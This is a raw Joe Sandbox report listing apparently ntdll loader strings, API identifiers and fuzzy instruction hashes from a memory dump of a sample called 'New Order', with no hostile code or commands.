                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              Strings
                                                                                                                              • LdrpCheckModule, xrefs: 0186A117
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              Strings
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 018BC1F1
                                                                                                                              • PreferredUILanguages, xrefs: 018BC212
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              Strings
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                              • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              Strings
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                              • kLsE, xrefs: 01800540
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0188895E
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              • Instruction Fuzzy Hash: CCB1A574A006099FDF24EF98C940EABBBB9FF86304F94445DAA02D7791DB74EA05CB10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: e64c1ae80a20750c2decfa1e52cb4a9dd8695febce881101b7ce0dcae61f7e54
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: 79B1053260464AAFDB11CBA8CC50BBEBBFAAF44304F140555E652DB385DB30EB81CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                              • Instruction ID: aa696d72eaf45fae5aedd2be7453c322dca90e00ab7e36d075bbe0d120954268
                                                                                                                              • Opcode Fuzzy Hash: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                              • Instruction Fuzzy Hash: C0C169706083458FD765CF19C884BABB7E9BF88304F44492DE989C7291D775EA48CF92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                              • Instruction ID: 32d9118590433cd8ab0e619d56509956c61f4adbf46fc64e3cc83f45ec92865d
                                                                                                                              • Opcode Fuzzy Hash: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                              • Instruction Fuzzy Hash: 2AB17170A002698BDB65CF58C884BAAF7B5EF44700F1485EDDA4AE7341EB309E85CB21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e120a6e61b6431de78d9180202a8367a17517a82e77139e9bf4c43084c15ae84
                                                                                                                              • Instruction ID: 9d0bf0f7ba1b2fb3f5387d82fe87606b3d9b8e54571d35e5834b8a6e6ace2986
                                                                                                                              • Opcode Fuzzy Hash: e120a6e61b6431de78d9180202a8367a17517a82e77139e9bf4c43084c15ae84
                                                                                                                              • Instruction Fuzzy Hash: 8BA1E431E006699FEB32DB5CD854FAEBBA9AB00714F050125EB11EB291D774DF80CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                              • Instruction ID: 8244f284fcdc8851f7e284f6592b14fe36b15207ae5dff29661b674eddceb3e6
                                                                                                                              • Opcode Fuzzy Hash: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                              • Instruction Fuzzy Hash: DCA1BE70A0061E9BDB25CF69C990BABB7B1FF54318F044129EB45DB281EB34EA51CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                              • Instruction ID: 914468e9988467b728d7e856ac4fd8f409f97f5734f17bb9b59122712a3990ba
                                                                                                                              • Opcode Fuzzy Hash: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                              • Instruction Fuzzy Hash: 8EA1CA72A04712AFC721DF18C980B5ABBE9FF48754F15062CF589DBA55D734EA00CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                              • Instruction ID: 5270e3f213830114e3d4881a50b2074bdc774addb04e6985f8709b21f1e7ec2f
                                                                                                                              • Opcode Fuzzy Hash: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                              • Instruction Fuzzy Hash: 88917171D0061AAFDB15DF68D884BAEBFB5AF49710F254169E610EB341E734EF009BA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b5834e02bad60bd7d35495a9dbfaca33ea9b8d43edd4031db55d480b098443e
                                                                                                                              • Instruction ID: 228bdd59d62d5c19eac54947c63d122cd11ee9a1df71b693dc136d69bcfc7cbf
                                                                                                                              • Opcode Fuzzy Hash: 9b5834e02bad60bd7d35495a9dbfaca33ea9b8d43edd4031db55d480b098443e
                                                                                                                              • Instruction Fuzzy Hash: 43910432A00616CFEB269B5CC480BB9BBAAEF94718F154169ED06DB288F634DB41C751
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                              • Instruction ID: 3edc3101fe2482ed4e3882662e84f3dacb0c79eff4fc0eec1d650aad1eca6bbc
                                                                                                                              • Opcode Fuzzy Hash: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                              • Instruction Fuzzy Hash: 01819471E0061A9BDB68CF69C940ABEBBF9FB48710F54852EE845D7640F734DA40CBA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: 5d3ff4bd6297fd3c4caba944c55ae4d3998aa7c5ff0ffe2340f29ba057f41e50
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: 48816F31A002099BDF19CF9CC880AAEBBB6EF84714F18856DD916DB345EB34EA01CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                              • Instruction ID: 1ac9ebf2d052c6c0bbdec4c3b8c4d6df763b68b71072e104bb3b1cee32d9baae
                                                                                                                              • Opcode Fuzzy Hash: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                              • Instruction Fuzzy Hash: F1813271900609AFDB25CFA9C880BDEBBFAFF88354F144429E555E7250D770AE45CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b475ec5285e80d7192bb012154638c954c272a7dea51d7b3a4693dd5016d930
                                                                                                                              • Instruction ID: 04f8af29b3058d90c5e729b8aaedf88b73f524328ce152bbf60d1c6686272e93
                                                                                                                              • Opcode Fuzzy Hash: 4b475ec5285e80d7192bb012154638c954c272a7dea51d7b3a4693dd5016d930
                                                                                                                              • Instruction Fuzzy Hash: EE71CFB5D00229DFCB258F59D890BBEBBB8FF59714F14451AE946EB354E3709A00CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                              • Instruction ID: 922fa80c6e3539f9bf442a883013889d4252a17516b3385b50d12ab6e6b46d05
                                                                                                                              • Opcode Fuzzy Hash: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                              • Instruction Fuzzy Hash: 64718170900205EFDB20DF69D985E9ABBF9EF90300B24525EE601E739AE7319B40CF55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              • Instruction Fuzzy Hash: 8841BC369002199BDB15DF98C440AEEBBB5BF88714F19826AF819F7340E7349E41CBA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                              • Instruction ID: fe86b6468034a6c5e8c3a97b40280f305d0f75d41528036183ad82566e67bab1
                                                                                                                              • Opcode Fuzzy Hash: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                              • Instruction Fuzzy Hash: A541D2722103059FD725EF6CC880A57B7EAFF98328F10492EE657C7215EB34EA848B55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: 8a1a98a87f62742a445cd2de2ee56e47a41b84a13ee01bc2eac159509957aedd
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: 6B514775A00219DFCB19CF98C480AAEF7B6FF84714F2881A9D915E7351D730EA82CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                              • Instruction ID: 64f1849af70932adb9de2951c4f7dbe30a3552b6a2211e1bc930339b97e3cdc1
                                                                                                                              • Opcode Fuzzy Hash: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                              • Instruction Fuzzy Hash: F451077090020BDBDB66CB28CC00BA8BBB5FF11314F2442A9E525D72C5E7345B91CF45
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0fc248ab343df0457e1ad3ce41ec2b3deb27929d0f65f537e8dd26f80249359c
                                                                                                                              • Instruction ID: 23342c7d8cc3c561609ec7f5432e3ffcada95b74e3aaffb8c5ebf8911554ef0a
